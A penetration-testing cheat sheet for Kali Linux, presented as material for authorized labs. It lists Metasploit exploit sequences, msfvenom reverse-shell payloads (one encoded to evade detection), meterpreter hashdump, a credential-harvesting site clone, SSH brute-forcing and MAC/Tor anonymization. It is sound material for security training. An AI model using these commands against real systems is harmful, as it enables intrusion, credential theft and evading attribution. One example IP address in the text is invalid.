Kali Linux Cheat Sheet: Essential
Commands for Penetration Testing
Introduction
Kali
Linux is a Debian-based distribution
tailored for cybersecurity professionals, offering a robust platform for
penetration testing, vulnerability scanning, and digital forensics. This cheat
sheet compiles essential commands for system management, networking, anonymization,
and popular Kali tools, designed for quick reference. Aimed at intermediate
users, it assumes familiarity with Linux and networking basics. Use these
commands ethically in authorized lab environments (e.g., TryHackMe, Hack The
Box, Web Security Academy). Unauthorized use is illegal and unethical.
This
cheat sheet complements your prior tutorials (e.g., Metasploit, msfvenom,
SEToolkit, Nessus) and includes commands for repository updates, MAC address
changing, IP hiding, and proxy setup, as requested.
General System Commands
Manage
the Kali Linux system efficiently.
- Check System Info:
uname
-a # Kernel and system details
Output: Linux kali
6.8.0-kali3-amd64 #1 SMP Debian 6.8.12-1kali1 (2025-08-15) x86_64 GNU/Linux
- Update System:
·
sudo apt update # Refresh package lists
·
sudo apt full-upgrade -y # Upgrade all packages
·
sudo apt autoremove -y # Remove unused packages
sudo
apt autoclean # Clean cached packages
- Manage Services:
·
systemctl start <service> # Start a service (e.g., apache2)
·
systemctl enable
<service> # Enable service at boot
·
systemctl status
<service> # Check service status
systemctl
stop <service> # Stop a service
- File System Navigation:
·
ls -la # List files with details
·
cd /path/to/directory # Change directory
·
pwd
# Print working directory
·
mkdir <dir> # Create directory
·
touch <file> # Create empty file
·
cp <source> <dest> # Copy files
·
mv <source> <dest> # Move/rename files
rm
-rf <file/dir> # Delete
files/directories
- Edit Files:
·
nano <file> # Edit with nano
·
vim <file> # Edit with vim
cat
<file> # Display file contents
- Check Processes:
·
ps aux # List all processes
·
top
# Interactive process viewer
kill
<pid> # Terminate process by ID
- System Reboot/Shutdown:
·
reboot # Reboot system
shutdown
now # Power off
Repository Management
Keep
Kali’s tools and system updated.
- Edit Repository Sources:
sudo
nano /etc/apt/sources.list
Add:
deb
http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware
- Update and Upgrade:
·
sudo apt update
sudo
apt full-upgrade -y
- Fix Broken Packages:
sudo
apt --fix-broken install
Networking Commands
Manage
and analyze network configurations.
- Check Network Interfaces:
ip
a # Show interfaces and IPs
Output: 2: eth0:
<UP> mtu 1500 inet 192.168.1.100/24
- Ping a Host:
ping
192.168.1.10 # Test connectivity
- Network Scanning:
·
nmap -sV 192.168.1.10 # Service version scan
·
nmap -p 1-65535 192.168.1.10 # Full port scan
nmap
-A 192.168.1.10 # Aggressive scan (OS,
services)
- Start HTTP Server:
python3
-m http.server 8000 # Serve files on
port 8000
- Check Open Ports:
netstat
-tuln # List listening ports
Anonymization Techniques
Protect
your identity during ethical testing.
MAC Address Changing
Spoof
MAC addresses to avoid tracking.
- Check Current MAC:
macchanger
-s eth0
Output: Current
MAC: 00:11:22:33:44:55
- Change MAC Address:
·
sudo ifconfig eth0 down
·
sudo macchanger -r eth0 # Random MAC
·
sudo macchanger -m 00:aa:bb:cc:dd:ee
eth0 # Specific MAC
sudo
ifconfig eth0 up
IP Hiding with Tor
Route
traffic through Tor for anonymity.
- Install Tor:
sudo
apt install tor -y
- Start Tor Service:
·
sudo systemctl start tor
sudo
systemctl enable tor
- Verify Tor IP:
torify
curl ifconfig.me
Output:
198.51.100.123 (Tor exit node IP)
- Route Commands via Tor:
torify
nmap -sT 192.168.1.10
Proxy Setup with Proxychains
Route
traffic through proxies.
- Install Proxychains:
sudo
apt install proxychains -y
- Configure Proxychains:
sudo
nano /etc/proxychains4.conf
Add:
socks5
127.0.0.1 9050 # Tor
#
Or external proxy: http 45.32.123.456 8080
- Use Proxychains:
proxychains
nmap -sT 192.168.1.10
Output:
|S-chain|-<>-127.0.0.1:9050-<>-192.168.1.10:80-<>-OK
Penetration Testing Tools
Commands
for common Kali tools.
Nmap (Network Scanning)
- Basic Scan:
nmap
192.168.1.10
- Service Detection:
nmap
-sV 192.168.1.10
- OS Detection:
nmap
-O 192.168.1.10
- Aggressive Scan:
nmap
-A 192.168.1.10
Metasploit Framework
- Start Metasploit:
msfconsole
- Search Exploits:
msf6
> search <keyword> # e.g.,
search windows/smb
- Use Exploit:
·
msf6 > use
exploit/windows/smb/ms08_067_netapi
·
msf6
exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.1.10
·
msf6
exploit(windows/smb/ms08_067_netapi) > set PAYLOAD
windows/meterpreter/reverse_tcp
·
msf6 exploit(windows/smb/ms08_067_netapi)
> set LHOST 192.168.1.100
·
msf6
exploit(windows/smb/ms08_067_netapi) > set LPORT 4444
msf6
exploit(windows/smb/ms08_067_netapi) > exploit
- Meterpreter Commands:
·
meterpreter > sysinfo
·
meterpreter > screenshot
·
meterpreter > hashdump
meterpreter
> shell
msfvenom (Payload Generation)
- Generate Windows Payload:
msfvenom
-p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o
shell.exe
- Encode Payload:
msfvenom
-p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e
x86/shikata_ga_nai -i 5 -f exe -o encoded_shell.exe
- Android Payload:
msfvenom
-p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f apk -o
android_shell.apk
Social-Engineering Toolkit (SET)
- Start SET:
sudo
setoolkit
- Credential Harvesting:
·
# Select: 1) Social-Engineering
Attacks > 2) Website Attack Vectors > 3) Credential Harvester > 2)
Site Cloner
·
# Set IP: 192.168.1.100
#
Set URL: http://192.168.1.10/wordpress/wp-login.php
Nessus (Vulnerability Scanning)
- Install Nessus:
sudo
dpkg -i Nessus-<version>-debian6_amd64.deb
- Start Nessus:
sudo
systemctl start nessusd
- Update Plugins:
sudo
/opt/nessus/sbin/nessuscli update
- Access Web Interface:
https://localhost:8834
WPScan (WordPress Scanning)
- Install WPScan:
sudo
apt install wpscan -y
- Scan WordPress:
wpscan
--url http://192.168.1.10/wordpress --enumerate p,t,u
sqlmap (SQL Injection)
- Basic Scan:
sqlmap
-u http://192.168.1.10/index.php?id=1
- Dump Database:
sqlmap
-u http://192.168.1.10/index.php?id=1 --dbs
Nikto (Web Scanning)
- Scan Website:
nikto
-h http://192.168.1.10
Burp Suite (Web Testing)
- Start Burp Suite:
burpsuite
- Set Proxy:
Configure
browser to use 127.0.0.1:8080
Aircrack-ng (Wireless Attacks)
- Monitor Mode:
sudo
airmon-ng start wlan0
- Capture Packets:
sudo
airodump-ng wlan0mon
- Crack WPA/WPA2:
sudo
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> capture.cap
Hydra (Password Cracking)
- Brute-Force SSH:
hydra
-l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
John the Ripper (Password Cracking)
- Crack Hashes:
john
hashes.txt
Practical Example: Scanning and Exploiting a Lab Target
Target:
Metasploitable3 (192.168.1.10) with a vulnerable WordPress site.
- Anonymize:
2. sudo
ifconfig eth0 down
3. sudo
macchanger -r eth0
4. sudo
ifconfig eth0 up
5. sudo
systemctl start tor
proxychains
curl ifconfig.me
- Scan with Nmap:
proxychains
nmap -sV 192.168.1.10
- Scan WordPress with WPScan:
proxychains
wpscan --url http://192.168.1.10/wordpress --enumerate p,t,u
- Exploit with Metasploit:
9. msfconsole
10.msf6 >
use exploit/unix/webapp/wp_reflexgallery_file_upload
11.msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOSTS 192.168.1.10
12.msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set TARGETURI
/wordpress/wp-admin/
13.msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set USERNAME admin
14.msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set PASSWORD password123
15.msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set PAYLOAD
cmd/unix/reverse_python
16.msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.1.100
17.msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set LPORT 4444
18.msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > set Proxies
socks5:127.0.0.1:9050
msf6
exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit
Best Practices and Tips
- Ethics and Legality: Obtain explicit permission; test only in lab
environments (e.g., TryHackMe, Hack The Box). Unauthorized actions violate
laws like the CFAA.
- Lab Setup: Use VMs (Metasploitable3, Docker) or cloud labs.
- Anonymity: Combine MAC spoofing, Tor, and Proxychains, but test
in labs to avoid legal risks.
- Updates: Regularly update Kali (apt full-upgrade) and tools
(e.g., msfupdate, wpscan --update).
- Integration: Use with Metasploit, msfvenom, SEToolkit, Nessus, and
others for comprehensive testing (see prior tutorials).
- Common Pitfalls:
- Avoid running Kali as a
primary OS; use VMs.
- Test proxies/Tor connectivity
before scans.
- Resources:
- Official Docs:
https://www.kali.org/docs/
- TryHackMe: “Kali Linux Basics”
and “Penetration Testing” rooms
- Hack The Box: “Metasploitable”
and “Legacy” machines
- Web Security Academy: https://portswigger.net/web-security
- Offensive Security:
https://www.offensive-security.com/kali-linux/
Visual References
Visuals
include terminal outputs and tool interfaces. For screenshots:
- Kali Website: https://www.kali.org (terminal and desktop).
- TryHackMe: “Kali Linux” room shows command outputs.
- Medium Articles: Search “Kali Linux cheat sheet” (e.g.,
https://medium.com/@securitygeek/kali-linux-commands).
- Offensive Security Blog: https://www.offensive-security.com/kali-linux/ for
tool screenshots.
Conclusion
This
Kali Linux cheat sheet provides a concise reference for essential commands,
enabling efficient penetration testing. Use it alongside tools like Metasploit,
Nessus, and SEToolkit in ethical, authorized lab environments to master
cybersecurity skills.
Author: Engr. M A Rashid Rony
Date: September 6, 2025
For updates, visit: https://www.kali.org